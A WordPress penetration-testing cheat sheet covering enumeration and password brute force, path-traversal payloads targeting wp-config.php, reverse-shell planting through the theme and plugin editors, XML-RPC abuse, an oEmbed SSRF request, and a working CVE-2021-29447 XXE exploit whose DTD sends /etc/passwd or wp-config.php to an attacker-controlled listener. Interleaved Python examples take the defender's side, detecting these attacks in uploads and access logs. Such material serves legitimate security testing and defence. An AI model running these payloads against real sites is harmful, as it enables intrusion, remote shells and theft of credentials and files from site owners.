# WordPress Pentesting

WordPress is a content management system.

### Enumeration <a href="#enumeration" id="enumeration"></a>

```
nmap --script http-wordpress-brute -p 80 <target-ip>
nmap --script http-wordpress-enum --script-args type="plugins",search-limit=1500 -p 80 <target-ip>
nmap --script http-wordpress-users -p 80 <target-ip>
nmap --script "http-wordpress-*" -p 80 <target-ip>   # quote the wildcard so the shell does not expand it
```

#### WpScan <a href="#wpscan" id="wpscan"></a>

[**Wpscan**](https://github.com/wpscanteam/wpscan) is a WordPress security scanner that enumerates the core version, plugins, themes and users, and can brute force credentials.

```
wpscan --url https://example.com -P wordlist.txt

# Skip TLS certificate verification (--disable-tls-checks)
wpscan --url https://example.com -P wordlist.txt --disable-tls-checks

# --rua: random user agent
# --http-auth username:password
# -e: enumerate
#  ap: All plugins
#  at: All themes
#  tt: Timthumbs
#  cb: Config backups
#  dbe: Db exports
#  u: User IDs range
#  m: Media IDs range
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url https://example.com -P /usr/share/wordlists/rockyou.txt

# Specify a username (-U)
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url https://example.com -U username -P /usr/share/wordlists/rockyou.txt
```

### Version Detection <a href="#version-detection" id="version-detection"></a>

WordPress advertises its version in a `generator` meta tag inside the `<head>` of the HTML source:

```
<meta name="generator" content="WordPress x.x.x" />
```
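As an added example (not code from this page), here is a Python check a site owner can run against their own pages to see which version is disclosed and whether it lags the version they believe is deployed. It reads the `generator` meta tag shown above and, going beyond the page, falls back to the `?ver=` query string WordPress appends to core assets under `/wp-includes/`, which survives when the generator tag is removed. The HTML is a constructed sample and `EXPECTED_VERSION` is an assumption.

```python
import re
from typing import Optional, Tuple

# Constructed sample of a page <head>; not taken from a real site.
SAMPLE_HTML = """<html><head>
<meta charset="UTF-8">
<meta name="generator" content="WordPress 6.4.2" />
<link rel="stylesheet" href="/wp-includes/css/dist/block-library/style.min.css?ver=6.4.2">
</head><body></body></html>"""

# Same head with the generator tag stripped, as many hardening guides recommend.
SAMPLE_HTML_NO_GENERATOR = SAMPLE_HTML.replace(
    '<meta name="generator" content="WordPress 6.4.2" />\n', ""
)

# Assumption: the version you believe is deployed (take it from your change log or wp-cli).
EXPECTED_VERSION = "6.5"

# The generator tag, with the name/content attributes in either order.
GENERATOR_RE = re.compile(
    r'<meta\b[^>]*\bname\s*=\s*["\']generator["\'][^>]*\bcontent\s*=\s*["\']WordPress\s+([0-9][0-9.]*)'
    r'|<meta\b[^>]*\bcontent\s*=\s*["\']WordPress\s+([0-9][0-9.]*)["\'][^>]*\bname\s*=\s*["\']generator["\']',
    re.IGNORECASE,
)
# Core assets get "?ver=<wp version>" appended unless a plugin or theme overrides it.
ASSET_VER_RE = re.compile(r'/wp-includes/[^"\'\s>]*?\?ver=([0-9][0-9.]*)', re.IGNORECASE)


def wp_version_from_html(html: str) -> Optional[Tuple[str, str]]:
    """Return (version, source) or None when neither disclosure is present."""
    m = GENERATOR_RE.search(html)
    if m:
        return (m.group(1) or m.group(2), "generator-meta")
    m = ASSET_VER_RE.search(html)
    if m:
        return (m.group(1), "asset-ver")
    return None


def version_tuple(v: str) -> Tuple[int, ...]:
    """'6.4.2' -> (6, 4, 2) so versions compare numerically, not lexically."""
    return tuple(int(p) for p in v.split("."))


def check_disclosure(html: str, expected: str = EXPECTED_VERSION) -> dict:
    """Summarise what the page leaks and whether it is behind the expected version."""
    found = wp_version_from_html(html)
    if found is None:
        return {"disclosed": False}
    version, source = found
    return {
        "disclosed": True,
        "version": version,
        "source": source,
        "behind_expected": version_tuple(version) < version_tuple(expected),
    }


if __name__ == "__main__":
    print(check_disclosure(SAMPLE_HTML))
    print(check_disclosure(SAMPLE_HTML_NO_GENERATOR))
```

Run it against the HTML of your own front page; a `behind_expected` of `True` means either the site was not updated or a cached page is still serving an older asset version.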

### Interesting Directories/Files <a href="#interesting-directoriesfiles" id="interesting-directoriesfiles"></a>

```
/author/admin/
/index.php/author/admin/
/license.txt
/readme.html
/robots.txt

/wp-admin/
/wp-admin/admin-ajax.php
/wp-admin/upload.php
/wp-config.php
/wp-content/
/wp-content/uploads/
/wp-includes/
/wp-json/wp/v1/
/wp-json/wp/v1/users
/wp-json/wp/v2/
/wp-json/wp/v2/users
/wp-login.php

# Users
/?author=1
/?author=2

# Posts
/?p=1
/?p=2

# Private/Draft Posts (WordPress <= 5.2.3)
/?static=1
```

### Try to Log In with Default Credentials <a href="#try-to-login-with-default-credential" id="try-to-login-with-default-credential"></a>

Open **`/wp-login.php`** and try the default credentials in the login form.

```
admin:password
```

### Path Traversal <a href="#path-traversal" id="path-traversal"></a>

Check whether the WordPress core version or an installed plugin is vulnerable to path traversal. For example:

```
/wp-content/plugins/<plugin_name>/<plugin_name>.php?someParam=../../../../wp-config.php
/wp-content/plugins/<plugin_name>/<plugin_name>.php?someParam=php://filter/resource=../../../../wp-config.php
/wp-content/plugins/<plugin_name>/php/<plugin_name>.php?someParam=../../../../wp-config.php
/wp-content/plugins/<plugin_name>/php/<plugin_name>.php?someParam=php://filter/resource=../../../../wp-config.php
```

### Reverse Shell <a href="#reverse-shell" id="reverse-shell"></a>

To get a reverse shell, we need admin credentials.

#### Metasploit <a href="#metasploit" id="metasploit"></a>

```
msfconsole
msf> use exploit/unix/webapp/wp_admin_shell_upload
msf> set RHOSTS <target-ip>
msf> set LHOST <local-ip>
msf> set USERNAME admin
msf> set PASSWORD admin
msf> check
msf> run
meterpreter> shell
```

#### PHP Reverse Shell Injection <a href="#php-reverse-shell-injection" id="php-reverse-shell-injection"></a>

* **Themes**
  1. Log in to the dashboard (**/wp-admin/**).
  2. Go to **"Appearance"** and select a theme, e.g. "Twenty Seventeen".
  3. Click **"Theme Editor"** or **"Editor"** in the **"Appearance"** section.
  4. In the theme editor, click **"404 Template (404.php)"** on the right.
  5. Paste the PHP reverse shell script from [here](https://github.com/pentestmonkey/php-reverse-shell). For Windows, [this payload](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php) is available.
  6. Set **`$ip`** and **`$port`** in the script to your local machine's IP address and port.
  7. In your terminal, start a netcat listener to catch the incoming connection from the website.

     ```
     nc -lvnp <local-port>
     ```
  8. Access "<https://vulnerable.com/wp-content/themes/twentyseventeen/404.php>". The netcat listener should receive a shell from the target.
* **Plugins**
  1. Go to Plugins → Plugin Editor.
  2. Insert the PHP reverse shell code into the plugin file (e.g. `plugin_name.php`) and update `$ip` and `$port`.
  3. Start a netcat listener (`nc -lvnp 4444`) in a terminal.
  4. Then access `https://example.com/wp-content/plugins/<plugin_name>/<plugin_name>.php`.
  5. We should get a shell.

### XML-RPC (xmlrpc.php) <a href="#xml-rpc-xmlrpcphp" id="xml-rpc-xmlrpcphp"></a>

* **Get All Methods**

  ```
  POST /xmlrpc.php HTTP/1.1
  Host: vulnerable.com
  ...

  <?xml version="1.0" encoding="utf-8"?>
  <methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
  </methodCall>
  ```
* **Ping Back**

  Use [**PostBin**](https://www.toptal.com/developers/postbin/) as the callback URL to confirm that the pingback request is actually sent.

  ```
  POST /xmlrpc.php HTTP/1.1
  Host: vulnerable.com
  ...

  <?xml version="1.0" encoding="utf-8"?>
  <methodCall>
  <methodName>pingback.ping</methodName>
  <params>
  <param><value><string>https://www.toptal.com/developers/postbin/xxxxxxxxxxxxx-xxxxxxxxxxxxx</string></value></param>
  <param><value><string>http://vulnerable.com</string></value></param>
  </params>
  </methodCall>
  ```
* **User Enumeration**

  It's recommended to use Burp Intruder or Turbo Intruder to brute force the username/password.

  ```
  POST /xmlrpc.php HTTP/1.1
  Host: vulnerable.com
  ...

  <?xml version="1.0" encoding="utf-8"?>
  <methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
  <param><value>{username}</value></param>
  <param><value>{password}</value></param>
  </params>
  </methodCall>
  ```

### XXE (CVE-2021-29447) <a href="#xxe-cve-2021-29447" id="xxe-cve-2021-29447"></a>

If you have normal user credentials, upload a crafted WAV media file carrying an XXE payload to read sensitive files.\
First, create **"exploit.wav"**.

```
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<local-ip>:9001/exploit.dtd'"'"'>%remote;%init;%trick;] >\x00'> exploit.wav
```

Next create **"exploit.dtd"**.

```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!-- <!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../wp-config.php"> -->
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://<local-ip>:9001/?p=%file;'>">
```

Then start a PHP web server on your local machine.

```
php -S 0.0.0.0:9001
```

On the target website, log in as the normal user, go to **"Media"** and click **"Add New"**.\
Upload **"exploit.wav"**.\
Then open the uploaded WAV file. The leaked data should appear in your console.
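As an added example from the defender's side (not code from this page), here is a Python pre-upload check that walks the RIFF chunks of a WAV and rejects files whose iXML metadata chunk carries a DOCTYPE or ENTITY declaration, which is the structure the exploit.wav above depends on, since WordPress reads iXML metadata from uploaded audio. Both WAV samples are constructed in the code; the malicious one mirrors the page's layout but points at a placeholder host.

```python
import struct
from typing import List, Tuple

# Declarations that have no place in audio tagging metadata but are required for XXE.
DTD_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")


def riff_chunks(data: bytes) -> List[Tuple[bytes, bytes]]:
    """Split a RIFF/WAVE container into (chunk id, payload) pairs.

    Malformed input raises ValueError so an upload handler can reject it outright
    instead of handing a half-parsed file to a metadata library.
    """
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    chunks = []
    pos = 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        payload = data[pos + 8:pos + 8 + size]
        if len(payload) != size:
            raise ValueError(f"chunk {cid!r} declares {size} bytes but the file is truncated")
        chunks.append((cid, payload))
        pos += 8 + size + (size & 1)  # chunk bodies are padded to an even length
    return chunks


def xxe_findings(data: bytes) -> List[str]:
    """Reasons to reject the file; an empty list means no DTD constructs in iXML."""
    findings = []
    for cid, payload in riff_chunks(data):
        if cid != b"iXML":  # the metadata chunk that gets parsed as XML
            continue
        for marker in DTD_MARKERS:
            if marker in payload:
                findings.append(f"iXML chunk contains {marker.decode()}")
    return findings


def should_reject(data: bytes) -> bool:
    """Single yes/no for an upload filter: malformed container or XXE indicators."""
    try:
        return bool(xxe_findings(data))
    except ValueError:
        return True


def build_wav(chunks: List[Tuple[bytes, bytes]]) -> bytes:
    """Assemble a minimal WAV from (id, payload) pairs; used only to construct the samples."""
    body = b"WAVE"
    for cid, payload in chunks:
        body += cid + struct.pack("<I", len(payload)) + payload
        if len(payload) & 1:
            body += b"\x00"
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed samples. The fmt chunk describes 8 kHz 16-bit mono PCM.
FMT_CHUNK = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)
SILENCE = b"\x00\x00" * 8
BENIGN_WAV = build_wav([
    (b"fmt ", FMT_CHUNK),
    (b"iXML", b"<?xml version='1.0'?><BWFXML><PROJECT>demo</PROJECT></BWFXML>"),
    (b"data", SILENCE),
])
# Same layout as the page's exploit.wav, with a placeholder host instead of a real listener.
XXE_WAV = build_wav([
    (b"fmt ", FMT_CHUNK),
    (b"iXML", b"<?xml version='1.0'?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM "
              b"'http://placeholder.invalid:9001/exploit.dtd'>%remote;]>"),
    (b"data", SILENCE),
])

if __name__ == "__main__":
    for name, wav in (("benign", BENIGN_WAV), ("xxe", XXE_WAV)):
        print(name, "reject" if should_reject(wav) else "accept", xxe_findings(wav))
```

Hook `should_reject` into whatever runs before the file reaches the media library (a `wp_handle_upload_prefilter` filter, a reverse-proxy upload scanner, or a periodic sweep of `wp-content/uploads`); patching WordPress remains the actual fix, this only narrows the window.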

#### Decode Base64 <a href="#decode-base64" id="decode-base64"></a>

To decode the Base64, create **"decode.php"** as follows.

```
<?php echo zlib_decode(base64_decode('<Base64_Here>')); ?>
```

Execute the script to decode it.

```
php decode.php
```
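As an added example (not from the page), the same decoding in Python, written as a function because of a caveat the one-liner hides: the `php://filter/zlib.deflate` stream in exploit.dtd is raw deflate with no zlib header, so a plain `zlib.decompress()` raises "incorrect header check". PHP's `zlib_decode()` accepts gzip, zlib and raw deflate alike, and the function below does the same. The three sample blobs are constructed inline.

```python
import base64
import gzip
import zlib


def php_zlib_decode(blob: bytes) -> bytes:
    """Accept the three stream types PHP's zlib_decode() accepts: gzip, zlib, raw deflate."""
    if blob[:2] == b"\x1f\x8b":                                   # gzip magic
        return zlib.decompress(blob, 16 + zlib.MAX_WBITS)
    if len(blob) >= 2 and blob[0] & 0x0F == 8 and ((blob[0] << 8) | blob[1]) % 31 == 0:
        return zlib.decompress(blob)                              # valid zlib CMF/FLG header
    return zlib.decompress(blob, -zlib.MAX_WBITS)                 # raw deflate (no header)


def decode_leaked(b64: str) -> str:
    """Equivalent of the decode.php one-liner above."""
    return php_zlib_decode(base64.b64decode(b64)).decode("utf-8", errors="replace")


def plain_zlib_fails(b64: str) -> bool:
    """True when the naive zlib.decompress() call cannot read the blob."""
    try:
        zlib.decompress(base64.b64decode(b64))
        return False
    except zlib.error:
        return True


def raw_deflate_b64(text: bytes) -> str:
    """Produce what php://filter/zlib.deflate/read=convert.base64-encode emits (constructed)."""
    c = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    return base64.b64encode(c.compress(text) + c.flush()).decode()


# Constructed sample content; not output from any real target.
SAMPLE_TEXT = b"root:x:0:0:root:/root:/bin/bash\n"
SAMPLES = {
    "raw": raw_deflate_b64(SAMPLE_TEXT),
    "zlib": base64.b64encode(zlib.compress(SAMPLE_TEXT)).decode(),
    "gzip": base64.b64encode(gzip.compress(SAMPLE_TEXT)).decode(),
}

if __name__ == "__main__":
    for kind, b64 in SAMPLES.items():
        print(kind, "naive zlib fails:", plain_zlib_fails(b64), "->", decode_leaked(b64).strip())
```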

### SSRF <a href="#ssrf" id="ssrf"></a>

#### oEmbed Proxy <a href="#oembed-proxy" id="oembed-proxy"></a>

```
/wp-json/oembed/1.0/proxy?url=http://10.0.0.1/
```
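As an added example (not part of this cheat sheet), here is a Python pass over web-server access logs that flags the techniques listed on this page from the defender's side: author-ID sweeps and `/wp-json/wp/v2/users` requests (Interesting Directories/Files), repeated POSTs to `wp-login.php` (default credentials and wpscan brute force), `../` and `php://filter` in query strings (Path Traversal), a POST to the theme or plugin editor followed by a direct request to a `.php` file under `wp-content` (PHP Reverse Shell Injection), bursts of POSTs to `xmlrpc.php` (XML-RPC), and oEmbed proxy requests pointing at internal addresses (SSRF). The log lines are constructed with RFC 5737 documentation addresses; the thresholds, rule names and the `example-plugin` path are assumptions to tune per site.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple
from urllib.parse import unquote

# Apache/nginx "combined" format; referer and user-agent fields are not needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Per-request signatures: a single match is enough to raise a finding.
PRIVATE_HOST = r"(10\.|127\.|192\.168\.|169\.254\.|172\.(1[6-9]|2\d|3[01])\.|localhost\b)"
REQUEST_RULES = [
    ("path-traversal", re.compile(r"\.\./|php://filter", re.I)),
    ("rest-user-enum", re.compile(r"^/wp-json/wp/v\d+/users\b", re.I)),
    ("oembed-proxy-ssrf", re.compile(r"^/wp-json/oembed/1\.0/proxy\?.*\burl=https?://" + PRIVATE_HOST, re.I)),
]
AUTHOR_RE = re.compile(r"^/(?:index\.php)?\?author=(\d+)")
EDITOR_RE = re.compile(r"^/wp-admin/(theme|plugin)-editor\.php")
CONTENT_PHP_RE = re.compile(r"^/wp-content/(themes|plugins)/[^?]*\.php(\?|$)")

# Per-source thresholds for the window being analysed (assumptions; tune per site).
AUTHOR_SWEEP_MIN = 3
POST_THRESHOLDS = {"login-bruteforce": 5, "xmlrpc-abuse": 5}

Finding = Tuple[str, str, str]  # (source ip, rule name, detail)


def analyse(lines: List[str]) -> List[Finding]:
    findings: List[Finding] = []
    author_ids: Dict[str, Set[str]] = defaultdict(set)
    post_counts: Dict[Tuple[str, str], int] = defaultdict(int)
    editor_writers: Set[str] = set()

    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; in production count these separately
        ip, method, raw_path = m["ip"], m["method"], m["path"]
        path = unquote(raw_path)  # one decode so "..%2F" matches; double encoding is out of scope here

        for name, rx in REQUEST_RULES:
            if rx.search(path):
                findings.append((ip, name, raw_path))

        am = AUTHOR_RE.match(path)
        if am:
            author_ids[ip].add(am.group(1))

        if method == "POST":
            if path.startswith("/wp-login.php"):
                post_counts[(ip, "login-bruteforce")] += 1
            elif path.startswith("/xmlrpc.php"):
                post_counts[(ip, "xmlrpc-abuse")] += 1
            elif EDITOR_RE.match(path):
                findings.append((ip, "editor-write", raw_path))
                editor_writers.add(ip)
        elif ip in editor_writers and CONTENT_PHP_RE.match(path):
            # Requesting the edited theme/plugin file directly is what triggers the injected code.
            findings.append((ip, "editor-then-direct-php", raw_path))

    for ip, ids in author_ids.items():
        if len(ids) >= AUTHOR_SWEEP_MIN:
            findings.append((ip, "author-id-sweep", f"{len(ids)} distinct author ids"))
    for (ip, name), n in post_counts.items():
        if n >= POST_THRESHOLDS[name]:
            findings.append((ip, name, f"{n} POSTs"))
    return findings


# Constructed access-log lines (RFC 5737 addresses); 192.0.2.1 is the benign visitor.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "curl/8.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "curl/8.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /?author=3 HTTP/1.1" 404 0 "-" "curl/8.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 512 "-" "curl/8.0"',
    *[f'198.51.100.7 - - [10/Oct/2023:13:56:{s:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3311 "-" "python-requests/2.31"' for s in range(1, 7)],
    *[f'198.51.100.7 - - [10/Oct/2023:13:57:{s:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 400 "-" "python-requests/2.31"' for s in range(1, 6)],
    '203.0.113.9 - - [10/Oct/2023:14:01:02 +0000] "GET /wp-content/plugins/example-plugin/example-plugin.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:14:01:09 +0000] "GET /wp-json/oembed/1.0/proxy?url=http://10.0.0.1/ HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [10/Oct/2023:14:05:00 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [10/Oct/2023:14:05:30 +0000] "GET /wp-content/themes/twentyseventeen/404.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.0.2.1 - - [10/Oct/2023:14:06:00 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"',
    '192.0.2.1 - - [10/Oct/2023:14:06:01 +0000] "GET /index.php HTTP/1.1" 200 10240 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(*finding)
```

The per-request rules fire on a single hit, the author-ID, login and xmlrpc rules only once a source crosses a threshold, and the editor rule correlates two events from the same source. The single visitor who hits `/?author=1` once produces nothing, which is the behaviour to check before deploying any of these rules on a busy site. Blocking `xmlrpc.php`, disabling the file editor with `DISALLOW_FILE_EDIT`, and restricting the REST users route remove most of these signals at the source.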
